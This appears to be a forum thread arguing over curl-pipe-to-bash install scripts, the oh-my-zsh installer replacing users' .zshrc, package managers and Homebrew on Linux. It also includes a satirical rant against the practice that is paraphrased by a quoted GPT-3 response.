If you're that much of a baby then I do not want your 'free' gift software and nor should anyone else. What other corners are you cutting everywhere else in the software? What other gross lack of integrity do you think is ok?
Maybe this is more the result of turning every random application into it's own cpntainer. It's fine to have an app installer configure the entire system to suit itself when the entire system is just the container to house the app.
> You do not take liberties with someone else's system, there is no need to do it and no excuse for it.
The whole point of the oh-my-zsh installation script is to modify your system to work with oh-my-zsh. If you don't want your system modified, you shouldn't run it: there is no other point of that script.
Build instructions are a completely separate thing, and are a complete distraction. No one sane waits for some random distro to discover your software and decide to package it themselves as a means of distributing it.
As far as most people are concerned, the role of things like apt or rpm is to manage the base system. Installing and keeping application software up to date is best left to the applications themselves - as it has always been on Windows or MacOS (before the app store craze), as it should be. It is not and should not be up to the Debian maintainers to tell me what version of Firefox to use, or how often I should update it.
Edit:
> Respecting the possibility that a config file or even the bins and libs might already exist as part of the "make install", are just part of the job like writing the software itself, not some unreasonable extra burden.
I assume you are referring to the author's complaint about the installer overriding their ~/.zshrc. If so, then that is again a misunderstanding of the point of this script - it explicitly tells you right in the description that it will do that AND it keeps the old file around in case you still need it.
To explain again - oh-my-zsh is a system for controlling your zsh installation. It's whole purpose is to take over things like your .zhsrc file. This is explained very clearly on their main page, so running that script and expecting it to not modify your zsh settings is like installing Firefox and expecting it not to connect to the Internet when you type a URL in the address bar.
It's not just omz, as the article itself also says, omz is just an example and actually one of the less extreme ones.
Similar assumptions and liberties are more and more common, changing all manner of system-wide default behavior not just a user's own configs, sometimes even in direct conflict with other software that wants to make is own system-wide config such that you nominally couldn't have both things at the same time. Whichever you installed 2nd would work and break the other. While in reality neither one actually needed to make such assumptions or break anything else, could coexist fine, it was just grossly and inexcusably inconsiderate installers and directions.
Package managers are sometimes great for the user, and as mentioned, a pain for the developer in many cases. To cover even "basic" bases, the developer has to manage many package managers. Ouch.
From the user side, the package manager often doesn't do what I want, either. I could install Node (as an example) via `apt` or `yum`, and end up with a Node installed in a root location. Now I'm in a mess. Or I could use a install script, or even yet another 3rd party solution such as `npm` to do what I actually want: Node installed for me. ...of course, I just mentioned a whole other can of worms: All the "other" package managers out there.
TL;DR: KISS often is the best solution.
Dive into the details of what "clean" packaging entails, how much practices differs between distributions, how many distributions there are, how each dependency also needs to be packaged and maintained across upgrades...
And you'll quickly see why projects say fsck it -- we support installation via curl | bash. go and package it yourself it you want to.
It really highlights the need for a broadly adopted "homebrew for linux" type package manager that could safely manage software without conflicting with OS packages.
Homebrew is Homebrew for Linux. You can install and use brew(1) on Linux. The Homebrew github worker even generates linux/amd64 binary "bottles" for each Homebrew package to make it fast (as long as the package doesn't explicitly opt out of Linux support.)
> "homebrew for linux" type package manager that could safely manage software without conflicting with OS packages.
As someone who uses Homebrew for Linux, I can say that "without conflicting with OS packages" cuts both ways: fine, I get more modern stuff than apt could imagine, but having to monkey with the LD_LIBRARY_PATH or -Wl,-rpath over and over gets old real fast. I have no idea why they tried to be so cute putting things in a stupid directory (/home/linuxbrew/.linuxbrew) instead of /usr/local like they did with Homebrew for Mac (err, not the arm64 version, where they went back to /opt/homebrew for whoknowswhy)
piping curl to bash is a heresy, an abomination that cannot be tolerated. it is an affront to my intellect and sensibility. it is an ethical turpitude and degeneracy that cannot be understated in its depravity.
It reduces the user to nothing more than an endured, pseudotrutworthy ball of lard in the developers formal equation of installation. As it is an installation however it beseeches the administrator, the root, the owner and the light of this system that it may achieve its purpose and in doing so is a blasphemy. it supplants my GNUlike will and in its stead enforces the hopes and dreams of nothing more than a transient, a visitor.
For the last time: The ground your code touches is holy and hallowed. the rites of Posix and the decree of the Unix philosophy at the sides of the throne you approach alone implores you not to speak unless spoken to, unless absolutely in the favor of the god of this land. To sudo curl|/bin/bash is to commit an unspeakable treason in the divine presence, a sin unforgiveable before the light of the PTY and the TTY. To take the sudo sword of the emperor alone and wield it as you see fit is damnable contempt indeed.
> GPT-3, please explain the above in simple English a five year old can understand.
Doing something called "piping curl to bash" is not a good idea. It's like trying to do something on someone else's computer without asking permission first. It puts you in the place of being in charge, even though it isn't your computer. Doing this can cause trouble and make the person who owns the computer very unhappy with you.
> OK, now explain the above in verses of King James English.
Behold, the ground thy code doth touch, Is holy and hallowed much. The rites of Posix and decree, Beseech thee not to speak unless spoken free. Alone thou approachest the throne divine, Unless in favor of God's law thine. To wield the sudo sword alone is sin most dire, And damnable contempt before heaven's fire. Forsooth 'tis treason unspeakable this day! curl|/bin/bash shalt thou never say!I've never been much for religion but maybe I just haven't gotten into the right stuff. Can I confess to you the sins of my .vimrc?
bash installer are neat, fast and dirty. They shines inside a Dockerfile, because enable to install not-yet-packaged software.
To avoid regret their launch, I enabled sudo to ask me a password, to avoid some sudo malicious command in the wild destroying my box or wiping my nas drives...who knows? :)
The entire point of Oh My Zsh is to get a specialty crafted instance of Zsh, so of course it overwrites your.zshrc.